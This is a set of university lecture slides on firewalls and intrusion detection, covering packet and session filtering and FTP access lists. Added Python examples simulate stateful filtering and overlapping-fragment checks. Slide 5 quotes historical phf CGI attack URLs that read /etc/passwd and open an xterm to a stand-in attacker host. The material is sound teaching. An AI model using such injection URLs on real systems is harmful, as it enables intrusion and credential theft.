UT CS 361s - Firewalls and Intrusion Detection
Vitaly Shmatikov
CS 361S
Firewalls and Intrusion Detection

Slide 2: Reading Assignment
• Chapter 23 in Kaufman
• Optional: “Firewall Gateways” (chapter 3 of “Firewalls and Internet Security” by Cheswick and Bellovin)
• Optional: “Insertion, Evasion and Denial of Service: Eluding Network Intrusion Detection” by Ptacek and Newman

Slide 3: Firewalls
Idea: separate local network from the Internet
[Figure: trusted hosts and networks behind a firewall and router; the intranet and a DMZ]
• Demilitarized Zone (DMZ): publicly accessible servers and networks

Slide 4: Castle and Moat
More like the moat around a castle than a firewall
• Restricts access from the outside
• Restricts outbound connections, too (!!)

Slide 5: Why Filter Outbound Connections?
whitehouse.gov: inbound X connections blocked by firewall, but input sanitization in phonebook script doesn’t filter out 0x0a (newline)
  http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd - displays pwd file
  http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20attackers.ip.address:0.0 - outbound connection to attacker’s X server (permitted by the firewall)
Use a cracked password to login, then buffer overflow in ufsrestore to get root
[From “The Art of Intrusion”]

Slide 6: Firewall Locations in the Network
Between internal LAN and external network
At the gateways of sensitive subnetworks within the organizational LAN
• Payroll’s network must be protected separately within the corporate network
On end-user machines
• “Personal firewall”
• Standard in Microsoft Windows

Slide 7: Types of Firewalls
Packet- or session-filtering router (filter)
Proxy gateway
• All incoming traffic is directed to firewall, all outgoing traffic appears to come from firewall
• Circuit-level: application-independent, “transparent”
  – Only generic IP traffic filtering (example: SOCKS)
• Application-level: separate proxy for each application
  – Different proxies for SMTP (email), HTTP, FTP, etc.
  – Filtering rules are application-specific
Personal firewall with application-specific rules
• E.g., no outbound telnet connections from email client

Slide 8: Illustration of Firewall Types
[Figure only]

Slide 9: Packet Filtering
For each packet, firewall decides whether to allow it to proceed – on a per-packet basis
• Stateless, cannot examine packet’s context (TCP connection, application-specific payload, etc.)
Filtering rules are based on pattern-matching packet header fields
• IP source and destination addresses, ports
• Protocol identifier (TCP, UDP, ICMP, etc.)
• TCP flags (SYN, ACK, RST, PSH, FIN)
• ICMP message type

Slide 10: Examples of Filtering Rules
[Table of example rules; not included in the text preview]

Slide 11: Example: FTP [Wenke Lee]
[Figure: FTP client using ports 5150 and 5151; FTP server using port 21 (Command) and port 20 (Data)]
1. Client opens command channel to server; tells server second port number
2. Server acknowledges
3. Server opens data channel to client’s second port
4. Client acknowledges
[Figure label: connection from a random port on an external host]

Slide 12: FTP Packet Filter
These rules allow a user to FTP from any IP address to the FTP server at 172.168.10.12

  access-list 100 permit tcp any gt 1023 host 172.168.10.12 eq 21
  access-list 100 permit tcp any gt 1023 host 172.168.10.12 eq 20
  ! Allows packets from any client to the FTP control and data ports
  access-list 101 permit tcp host 172.168.10.12 eq 21 any gt 1023
  access-list 101 permit tcp host 172.168.10.12 eq 20 any gt 1023
  ! Allows the FTP server to send packets back to any IP address with TCP ports > 1023
  interface Ethernet 0
  access-list 100 in    ! Apply the first rule to inbound traffic
  access-list 101 out   ! Apply the second rule to outbound traffic

“Default deny”: anything not explicitly permitted by the access list is denied

Slide 13: Screened Subnet
Only the screened subnet is visible to the external network; internal network is invisible

Slide 14: Screened Subnet Using Two Routers
[Figure only]

Slide 15: Source/Destination Address Forgery
[Figure only]

Slide 16: Protecting Addresses and Routes
Hide IP addresses of hosts on internal network
• Only services that are intended to be accessed from outside need to reveal their IP addresses
• Keep other addresses secret to make spoofing harder
Use NAT (network address translation) to map addresses in packet headers to internal addresses
• 1-to-1 or N-to-1 mapping
Filter route announcements
• No need to advertise routes to internal hosts
• Prevent attacker from advertising that the shortest route to an internal host lies through him

Slide 17: Weaknesses of Packet Filters
Do not prevent application-specific attacks
• For example, if there is a buffer overflow in the Web server, firewall will not block an attack string
No authentication
• … except (spoofable) address-based authentication
• Firewalls operate only at the network level
Vulnerable to TCP/IP attacks such as spoofing
• Solution: list of addresses for each interface (packets with internal addresses shouldn’t come from outside)
Vulnerable to misconfiguration

Slide 18: Stateless Filtering Is Not Enough
In TCP connections, ports with numbers less than 1024 are permanently assigned to servers
• 20, 21 - FTP, 23 - telnet, 25 - SMTP, 80 - HTTP…
Clients use ports numbered from 1024 to 65535
• They must be available for clients to receive responses
What should a firewall do if it sees, say, an outgoing request to some client’s port 5151?
• It must allow it: this could be a server’s response in a previously established connection …
• … OR it could be malicious traffic
• Can’t tell without keeping state for each connection

Slide 19: Example: Using High Ports
[Figure: Inbound SMTP / Outbound SMTP]

Slide 20: Session Filtering
Decision is still made separately for each packet, but in the context of a connection
• If new connection, then check against security policy
• If existing connection, then look it up in the table and update the table, if necessary
  – Only allow packets to a high-numbered port if there is an established connection from that port
  – Example of an update: if RST, remove connection from table
Hard to filter stateless protocols (UDP) and ICMP
Filters can be bypassed with IP tunneling

Slide 21: Example: Connection State Table
[Figure only]

Slide 22: Stateful or Dynamic Packet Filtering
[Figure only]

Slide 23: Abnormal Fragmentation
For example, ACK bit is set in both fragments, but when reassembled, SYN bit is set (can stage SYN flooding through firewall)
[Wenke
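The question on the "Stateless Filtering Is Not Enough" slide and the connection table on the "Session Filtering" slide, worked through as an added example (this is not code from the lecture or from any firewall product). The internal network 10.0.0.0/24, the server and stranger addresses, the port numbers and the `expect` helper that stands in for an application-level FTP proxy are all assumptions made for the demo:

```python
"""Stateless packet filtering versus session (stateful) filtering.

Added example, not from the lecture or from any real firewall. It models the
slides' scenario: internal clients on a constructed 10.0.0.0/24, servers on
ports < 1024, and an active-mode FTP data channel arriving from server port 20
at the client's high port 5151. All addresses and ports are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Set, Tuple

INTERNAL_PREFIX = "10.0.0."        # constructed internal network
Key = Tuple[str, int, str, int]    # (client_ip, client_port, server_ip, server_port)


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIX)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset = frozenset()   # subset of {"SYN", "ACK", "RST", "FIN"}

    @property
    def inbound(self) -> bool:
        return is_internal(self.dst) and not is_internal(self.src)


def stateless_allow(p: Packet) -> bool:
    """Per-packet decision from header fields only (no connection context).

    To let server replies and active-mode FTP data reach client high ports, a
    stateless rule set has to admit any inbound packet that looks the part:
    it cannot know whether a connection to that port actually exists.
    """
    if not p.inbound:
        return True                      # internal hosts may open connections
    if p.dport <= 1023:
        return False                     # no unsolicited inbound to server ports
    if p.sport == 20:
        return True                      # FTP data channel (server port 20)
    return "ACK" in p.flags              # "established" heuristic: ACK bit set


class SessionFilter:
    """Per-packet decision made in the context of a connection table."""

    def __init__(self) -> None:
        self.table: Set[Key] = set()

    @staticmethod
    def _key(p: Packet) -> Key:
        # both directions of one connection map to the same table entry
        if is_internal(p.src):
            return (p.src, p.sport, p.dst, p.dport)
        return (p.dst, p.dport, p.src, p.sport)

    def expect(self, client: str, cport: int, server: str, sport: int) -> None:
        """Register a channel negotiated at the application layer (e.g. an FTP
        PORT command seen on the control connection; parsing it is outside
        this example)."""
        self.table.add((client, cport, server, sport))

    def allow(self, p: Packet) -> bool:
        key = self._key(p)
        if key in self.table:
            if "RST" in p.flags:                  # the slide's example update
                self.table.discard(key)
            return True
        if not p.inbound and "SYN" in p.flags and "ACK" not in p.flags:
            self.table.add(key)                   # new connection: policy check passed
            return True
        return False   # inbound to a high port with no established connection


def demo() -> Dict[str, bool]:
    """Send the same packets through both filters; return each decision."""
    client, server, stranger = "10.0.0.5", "198.51.100.7", "203.0.113.9"
    sf = SessionFilter()
    syn = Packet(client, 5150, server, 21, frozenset({"SYN"}))
    reply = Packet(server, 21, client, 5150, frozenset({"SYN", "ACK"}))
    data = Packet(server, 20, client, 5151, frozenset({"SYN"}))
    # unsolicited packet to the client's high port; source port 20 chosen by the sender
    rogue = Packet(stranger, 20, client, 5151, frozenset({"SYN"}))
    rst = Packet(server, 21, client, 5150, frozenset({"RST"}))

    out = {"stateless_reply": stateless_allow(reply),
           "stateless_rogue": stateless_allow(rogue),
           "stateful_open": sf.allow(syn),
           "stateful_reply": sf.allow(reply)}
    sf.expect(client, 5151, server, 20)           # PORT 5151 seen on the control channel
    out["stateful_data"] = sf.allow(data)
    out["stateful_rogue"] = sf.allow(rogue)
    out["stateful_rst"] = sf.allow(rst)
    out["stateful_after_rst"] = sf.allow(reply)   # entry removed, so now denied
    return out


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:20s} {'allow' if verdict else 'deny'}")
```

The stateless filter passes both the genuine FTP data channel and the stranger's packet to port 5151, because the only thing distinguishing them is whether a connection was set up earlier. The session filter admits the data channel only after the application layer registered it and denies the stranger's packet, and once an RST removes the entry, further packets on that tuple are denied as well.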
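The "Abnormal Fragmentation" slide's point, as an added example (not from the lecture): a filter that inspects each fragment on its own sees ACK, while the header that exists after reassembly carries SYN. The fragments are constructed test vectors, offsets are in bytes rather than IP's 8-byte units, and the policy function is an assumption; the defensive check it demonstrates is to decide only on the reassembled header and to drop fragments whose overlap is ambiguous:

```python
"""Per-fragment flag inspection versus inspection after reassembly.

Added example, not from the lecture. Fragment offsets are in bytes here
(real IP uses 8-byte units) and the fragments are constructed test vectors.
"""
from typing import List, Optional, Tuple

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
FLAGS_BYTE = 13            # TCP flags live in byte 13 of the TCP header
TCP_HEADER_LEN = 20

Fragment = Tuple[int, bytes]   # (byte offset within the segment, payload)


def flags_of(segment: bytes) -> int:
    return segment[FLAGS_BYTE] & 0x3F


def per_fragment_flags(fragments: List[Fragment]) -> Optional[int]:
    """What a filter sees when it judges fragments one at a time: only the
    fragment at offset 0 carries the TCP header, so later fragments that
    overlap it are never consulted."""
    for off, data in fragments:
        if off == 0 and len(data) > FLAGS_BYTE:
            return flags_of(data)
    return None


def reassemble(fragments: List[Fragment], reject_conflicts: bool = True) -> Optional[bytes]:
    """Rebuild the segment. Overlapping fragments whose bytes disagree are
    ambiguous (end hosts resolve them differently), so the safe policy returns
    None and the packet is dropped. With reject_conflicts=False the last
    fragment wins, which is the behaviour an overlap relies on."""
    buf = {}
    for off, data in fragments:
        for i, b in enumerate(data):
            pos = off + i
            if pos in buf and buf[pos] != b and reject_conflicts:
                return None
            buf[pos] = b
    if not buf or set(buf) != set(range(max(buf) + 1)):
        return None                              # gap: cannot reassemble yet
    return bytes(buf[i] for i in range(len(buf)))


def decide_inbound(fragments: List[Fragment]) -> str:
    """Inbound policy (assumed): a connection attempt (SYN without ACK) is
    denied, an established-connection packet (ACK) is allowed, and ambiguous
    or incomplete fragments are dropped. Decided on the reassembled header only."""
    seg = reassemble(fragments)
    if seg is None or len(seg) < TCP_HEADER_LEN:
        return "drop"
    f = flags_of(seg)
    if f & SYN and not f & ACK:
        return "deny"
    return "allow"


def ack_header() -> bytes:
    """Constructed: a 20-byte TCP header with only ACK set."""
    h = bytearray(TCP_HEADER_LEN)
    h[FLAGS_BYTE] = ACK
    return bytes(h)


def benign_fragments() -> List[Fragment]:
    """Constructed: the ACK segment split cleanly at byte 8, no overlap."""
    h = ack_header()
    return [(0, h[:8]), (8, h[8:])]


def overlapping_fragments() -> List[Fragment]:
    """Constructed test vector: fragment 2 overlaps bytes 8..19 of fragment 1
    and disagrees in the flags byte (SYN instead of ACK)."""
    h = ack_header()
    second = bytearray(h[8:])
    second[FLAGS_BYTE - 8] = SYN
    return [(0, h), (8, bytes(second))]


if __name__ == "__main__":
    print("per-fragment view    :", hex(per_fragment_flags(overlapping_fragments())))
    lax = reassemble(overlapping_fragments(), reject_conflicts=False)
    print("last-wins reassembly :", hex(flags_of(lax)))
    print("strict decision      :", decide_inbound(overlapping_fragments()))
    print("benign decision      :", decide_inbound(benign_fragments()))
```

The per-fragment view reports ACK for the overlapping test vector, a last-wins reassembler yields SYN, and the strict decision drops the packet rather than guessing which of the two interpretations the receiving host will use; the cleanly split ACK segment still passes.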